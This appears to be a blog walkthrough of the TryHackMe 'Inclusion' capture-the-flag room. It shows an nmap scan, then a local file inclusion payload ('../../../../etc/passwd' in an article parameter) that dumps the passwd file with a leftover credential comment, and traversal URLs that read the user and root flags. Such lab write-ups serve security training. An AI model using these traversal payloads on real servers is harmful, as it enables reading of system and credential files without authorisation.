CatSec.org

Inclusion

In this post, we will look into the room “Inclusion” from TryHackMe, which can be found on https://tryhackme.com

Starting with Enumeration

nmap -Pn -vv <target_ip>

You can see by the result that the machine hosts a website

http://<machine_ip>:<port>

By pressing any View Details button the link takes this form:

/article?name=

The LFI Atack Page gives you where the /ect/passwd is exactly Full link should look like this:

http://<machine_ip>:<port>/article?name=../../../../etc/passwd

The Output (PageDisplay):

============================================================================

root:x:0:0:root:/root:/bin/bash 

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usrsbin/nologin 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin 
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin 
syslog:x:102:106::/home/syslog:/usr/sbin/nologin 
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin 
lxd:x:105:65534::/var/lib/lxd/:/bin/false 
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin 
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin 
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin 
pollinate:x:109:1::/var/cache/pollinate:/bin/false 
falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash 
#<username>:<password> 
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin 
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false

============================================================================

So we have a comment #<username>:<password> We can connect to the machine via ssh using this users credentials

ssh <username>@<ip>

pass: <password>

After connecting just do:

cat user.txt

But

We dont have to even do this by the time we know a users name we can just use the LFI-attack Since we have the path to etc we know that ther user is here ../../../../home/<username>

User Flag:

http://<machine_ip>:<port>/article?name=../../../../home/<username>/user.txt

And the same way we can retrieve ther root flag

Root Flag:

http://<machine_ip>:<port>/article?name=../../../../root/root.txt